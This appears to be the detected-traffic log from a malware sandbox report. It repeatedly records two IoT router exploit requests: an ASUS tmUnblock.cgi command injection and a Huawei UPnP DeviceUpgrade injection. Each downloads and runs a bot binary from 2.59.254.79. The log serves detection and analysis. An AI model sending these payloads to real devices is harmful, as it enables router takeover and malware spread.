Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
